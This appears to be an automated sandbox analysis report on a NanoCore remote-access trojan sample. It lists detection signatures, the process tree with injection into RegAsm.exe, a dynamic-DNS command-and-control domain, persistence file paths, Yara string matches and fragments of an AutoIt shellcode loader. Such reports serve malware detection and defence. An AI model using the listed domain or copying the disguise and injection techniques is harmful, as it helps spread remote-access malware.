
Analysis Report d4e475d7d17a16be8b9eeac6e10b25af

Overview

General Information

Sample Name:d4e475d7d17a16be8b9eeac6e10b25af (renamed file extension from none to exe)
Analysis ID:320928
MD5:5162337b6fd4c8806ef62f6ebf4a5df8
SHA1:126642db1117de853d7e0ae601e0ff45358d7413
SHA256:9c2e4a4a0e7bb4c3c47ca33ec0d0c377fa38e0ae498721062432648ebf060a10
Tags:NanoCore

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
AutoIt script contains suspicious strings
Binary is likely a compiled AutoIt script file
Contains functionality to inject code into remote processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Uses dynamic DNS services
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • d4e475d7d17a16be8b9eeac6e10b25af.exe (PID: 576 cmdline: 'C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe' MD5: 5162337B6FD4C8806EF62F6EBF4A5DF8)
    • RegAsm.exe (PID: 5656 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe MD5: 529695608EAFBED00ACA9E61EF333A7C)
  • DiagnosticsHub.StandardCollector.Service.exe.bat (PID: 5944 cmdline: 'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat' MD5: F660ED54597E4FF5354B557329CAB70D)
    • RegAsm.exe (PID: 4332 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe MD5: 529695608EAFBED00ACA9E61EF333A7C)
  • dhcpmon.exe (PID: 5860 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)
    • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"C2: ": ["255.255.255.255"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Yara Overview

Memory Dumps

Columns: Source | Rule | Description | Author | Strings
Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp | Rule: Nanocore_RAT_Gen_2 | Description: Detetcs the Nanocore RAT | Author: Florian Roth
  • 0xf34d:$x1: NanoCore.ClientPluginHost
  • 0xf38a:$x2: IClientNetworkHost
  • 0x12ebd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp | Rule: JoeSecurity_Nanocore | Description: Yara detected Nanocore RAT | Author: Joe Security
Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp | Rule: NanoCore | Description: unknown | Author: Kevin Breen <kevin@techanarchy.net>
  • 0xf0b5:$a: NanoCore
  • 0xf0c5:$a: NanoCore
  • 0xf2f9:$a: NanoCore
  • 0xf30d:$a: NanoCore
  • 0xf34d:$a: NanoCore
  • 0xf114:$b: ClientPlugin
  • 0xf316:$b: ClientPlugin
  • 0xf356:$b: ClientPlugin
  • 0xf23b:$c: ProjectData
  • 0xfc42:$d: DESCrypto
  • 0x1760e:$e: KeepAlive
  • 0x155fc:$g: LogClientMessage
  • 0x117f7:$i: get_Connected
  • 0xff78:$j: #=q
  • 0xffa8:$j: #=q
  • 0xffc4:$j: #=q
  • 0xfff4:$j: #=q
  • 0x10010:$j: #=q
  • 0x1002c:$j: #=q
  • 0x1005c:$j: #=q
  • 0x10078:$j: #=q
Source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp | Rule: Nanocore_RAT_Gen_2 | Description: Detetcs the Nanocore RAT | Author: Florian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp | Rule: JoeSecurity_Nanocore | Description: Yara detected Nanocore RAT | Author: Joe Security
77 memory-dump entries in total; only the first are shown here.

Unpacked PEs

Columns: Source | Rule | Description | Author | Strings
Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack | Rule: Nanocore_RAT_Gen_2 | Description: Detetcs the Nanocore RAT | Author: Florian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack | Rule: Nanocore_RAT_Feb18_1 | Description: Detects Nanocore RAT | Author: Florian Roth
  • 0xff05:$x1: NanoCore Client.exe
  • 0x1018d:$x2: NanoCore.ClientPluginHost
  • 0x117c6:$s1: PluginCommand
  • 0x117ba:$s2: FileCommand
  • 0x1266b:$s3: PipeExists
  • 0x18422:$s4: PipeCreated
  • 0x101b7:$s5: IClientLoggingHost
Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack | Rule: JoeSecurity_Nanocore | Description: Yara detected Nanocore RAT | Author: Joe Security
Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack | Rule: NanoCore | Description: unknown | Author: Kevin Breen <kevin@techanarchy.net>
  • 0xfef5:$a: NanoCore
  • 0xff05:$a: NanoCore
  • 0x10139:$a: NanoCore
  • 0x1014d:$a: NanoCore
  • 0x1018d:$a: NanoCore
  • 0xff54:$b: ClientPlugin
  • 0x10156:$b: ClientPlugin
  • 0x10196:$b: ClientPlugin
  • 0x1007b:$c: ProjectData
  • 0x10a82:$d: DESCrypto
  • 0x1844e:$e: KeepAlive
  • 0x1643c:$g: LogClientMessage
  • 0x12637:$i: get_Connected
  • 0x10db8:$j: #=q
  • 0x10de8:$j: #=q
  • 0x10e04:$j: #=q
  • 0x10e34:$j: #=q
  • 0x10e50:$j: #=q
  • 0x10e6c:$j: #=q
  • 0x10e9c:$j: #=q
  • 0x10eb8:$j: #=q
Source: 3.2.RegAsm.exe.400000.0.unpack | Rule: Nanocore_RAT_Gen_2 | Description: Detetcs the Nanocore RAT | Author: Florian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7 unpacked-PE entries in total; only the first are shown here.

Sigma Overview

System Summary:

Sigma detected: NanoCore
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 5656, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Avira: detection malicious, Label: HEUR/AGEN.1100084
Found malware configuration
Source: RegAsm.exe.4332.3.memstr | Malware Configuration Extractor: NanoCore {"C2: ": ["255.255.255.255"], "Version: ": "NanoCore Client, Version=1.2.2.0"}
Multi AV Scanner detection for submitted file
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Virustotal: Detection: 66%
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Metadefender: Detection: 37%
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | ReversingLabs: Detection: 70%
Yara detected Nanocore RAT
Source: Yara match | File source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.250595233.0000000003451000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 5944, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4332, type: MEMORY
Source: Yara match | File source: Process Memory Space: d4e475d7d17a16be8b9eeac6e10b25af.exe PID: 576, type: MEMORY
Source: Yara match | File source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, type: UNPACKEDPE
Source: 3.2.RegAsm.exe.400000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_00424696 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00424696
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_00423D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00423D4E
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_004245C1 FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,2_2_004245C1
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_0042C93C FindFirstFileW,FindClose,2_2_0042C93C
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_0042C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,2_2_0042C9C7
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_0042F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0042F200
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_0042F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0042F35D
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_0042F65E FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_0042F65E
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_00423A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00423A2B
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_0042BF27 FindFirstFileW,FindNextFileW,FindClose,2_2_0042BF27

Networking:

Uses dynamic DNS services
Source: unknown | DNS query: name: windowslivesoffice.ddns.net
Source: Joe Sandbox View | ASN Name: COGENT-174US COGENT-174US
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_004325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_004325E2
Source: unknown | DNS traffic detected: queries for: windowslivesoffice.ddns.net
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_0043425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_0043425A
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_00420219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,2_2_00420219
Source: RegAsm.exe, 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmp | Binary or memory string: RegisterRawInputDevices
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_0044CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0044CDAC

E-Banking Fraud:

Yara detected Nanocore RAT
Sources: the same 31 Yara match sources (memory dumps, process memory spaces and unpacked PEs) listed under this signature in the AV Detection section above.

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.250595233.0000000003451000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 5944, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 5944, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegAsm.exe PID: 4332, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 4332, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: d4e475d7d17a16be8b9eeac6e10b25af.exe PID: 576, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: Process Memory Space: d4e475d7d17a16be8b9eeac6e10b25af.exe PID: 576, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
        AutoIt script contains suspicious strings
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | AutoIt Script: 1 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | AutoIt Script: 792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXH
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr | AutoIt Script: 1 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr | AutoIt Script: 792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXH
        Binary is likely a compiled AutoIt script file
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe, 00000000.00000000.204952653.00000000009A5000.00000002.00020000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe, 00000000.00000000.204952653.00000000009A5000.00000002.00020000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: This is a third-party compiled AutoIt script. | 2_2_003C3B4C
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat | String found in binary or memory: This is a third-party compiled AutoIt script.
